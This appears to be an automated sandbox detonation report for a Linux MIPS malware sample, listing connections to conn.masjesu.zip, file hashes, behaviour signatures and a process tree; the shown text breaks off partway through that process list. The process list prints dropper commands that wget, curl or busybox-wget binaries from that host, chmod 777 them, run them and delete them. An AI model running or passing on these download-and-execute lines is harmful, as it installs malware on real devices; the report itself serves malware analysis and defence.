| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 02:42
Reported
2024-10-28 02:44
Platform
debian9-mipsel-20240611-en
Max time kernel
81s
Max time network
80s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | N/A |
| N/A | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | N/A |
| N/A | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | N/A |
| N/A | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | N/A |
| N/A | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | N/A |
| N/A | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | N/A |
| N/A | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | N/A |
| N/A | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | N/A |
| N/A | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | N/A |
| N/A | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | N/A |
| N/A | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | N/A |
| N/A | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | N/A |
| N/A | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | N/A |
| N/A | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | N/A |
| N/A | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | N/A |
| N/A | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | N/A |
| N/A | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | N/A |
| N/A | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | N/A |
| N/A | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | N/A |
| N/A | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | N/A |
| N/A | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | N/A |
| N/A | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | N/A |
| N/A | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | N/A |
| N/A | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | N/A |
| N/A | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | N/A |
| N/A | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | N/A |
| N/A | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | N/A |
| N/A | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | /usr/bin/curl | N/A |
| File opened for modification | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /usr/bin/curl | N/A |
Processes
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
[/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/chmod
[chmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
[./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/rm
[rm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/chmod
[chmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
[./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/rm
[rm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/chmod
[chmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v
[./ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/rm
[rm ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/chmod
[chmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
[./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/rm
[rm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/chmod
[chmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
[./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/rm
[rm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/chmod
[chmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
[./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/rm
[rm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/chmod
[chmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
[./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/rm
[rm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/chmod
[chmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
[./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/rm
[rm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/chmod
[chmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
[./OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/rm
[rm OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/chmod
[chmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
[./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/rm
[rm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/chmod
[chmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead
[./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/rm
[rm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/chmod
[chmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA
[./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/rm
[rm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/chmod
